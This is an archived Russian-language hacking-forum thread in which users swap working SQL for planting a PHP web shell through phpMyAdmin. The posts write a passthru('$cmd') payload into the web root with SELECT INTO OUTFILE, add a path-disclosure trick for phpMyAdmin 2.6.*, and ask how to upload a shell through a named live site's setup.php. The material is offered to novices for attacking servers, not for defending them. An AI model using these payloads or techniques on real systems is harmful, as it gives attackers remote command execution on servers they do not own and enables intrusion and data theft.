Просмотр полной версии : PhpMyAdmin
Возможно ли закачать на сервер удаленный веб шелл имея доступ к phpmyadmin ?
GreenBear
14.03.2006, 18:21
UPDATE table SET hz='<? passthru("$cmd"); ?>'WHERE id=1;
SELECT hzINTO OUTFILE '/home/user/www/shell.php' FROM table where id=1;
UPDATE table SET hz='<? passthru("$cmd"); ?>'WHERE id=1;
SELECT hzINTO OUTFILE '/home/user/www/shell.php' FROM table where id=1;
Не получается ... возможно я что-то делаю не так :(
GreenBear
14.03.2006, 20:10
как это не работает?
попробуй так... раз там понять не можеш.
CREATE TABLE `shell` (s TEXT);
INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
SELECT `s` INTO OUTFILE '/home/user/www/shell.php' FROM `shell`;
DROP TABLE `shell`;
работает на 100% =)
/home/user/www/shell.php
замени на свой путь...
UPDATE `существующая таблица` SET `существующий параметер`='<? passthru("$cmd"); ?>'WHERE id=1;
SELECT `существующая таблица`, `существующий параметер` into OUTFILE '/home/user/полный серверный путь/shell.php' FROM существующая таблица where id=1;
Попробовал объяснить подробней.
Советую почитать как правильно задавать вопросы в технических форумах.
Не получается ... возможно я что-то делаю не так
Дело в том что нужно не втупую переписать код что тебе дал грин_бир а хотябы немного подумать, сменить названия директорий, к примеру..мдаа
Спасибо за помощь. Уже разобрался :cool:
SELECT '<? passthru("$cmd"); ?>' into OUTFILE "/home/hosting/wwwdata/sm.php";
Порылся по форуму, нащёл эту тему... Я хочу замутить такую штуку в MSSQL 2000 При любом расклаже выдаёт это Line 2: Incorrect syntax near 'C:/test_shell.php'
ну а для полных нубов можете видео соорудить???
Порылся по форуму, нащёл эту тему... Я хочу замутить такую штуку в MSSQL 2000 При любом расклаже выдаёт это Line 2: Incorrect syntax near 'C:/test_shell.php'
Ты путь походу непрописываешь куда шелл залить.
Или возможно он ругаеться на : если ты пишешь полностью путь.
да мне бы хоть научиться файлы в phpmyadmin заливать
разжуйте для noooба плз
Что именно тебе разжевать?
Чтобы узнать путь сайта. Если версия phpmyadmin 2.6.*
То делай так phpmyadmin/libraries/database_interface.lib.php?cfg[Server][extension]=LOCAL_FILE
Он тебе покажет путь.
Ну а вообще читай тему которые уже созданы
http://forum.antichat.ru/threadnav31153-1-10-phpMyAdmin.html
как remview залить на другой ip код к eго phpmyadmin я знаю
как remview залить на другой ip код к eго phpmyadmin я знаю
Нече непонял.Под словом код я как понимаю ты подразумеваешь путь а насчет ип нече непонял. Сформулируй нормальней.
всем спс инфа больше не требуется Ice мне помог)))
Кто нить знает баги в версиях
2.8.2.4
и 2.8.2
кто нибудь знает как с помощью этого http://l2db.ru/phpmyadmin/scripts/setup.php залить шелл?
кто нибудь знает как с помощью этого http://l2db.ru/phpmyadmin/scripts/setup.php залить шелл?
Было бы всё так просто ;)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot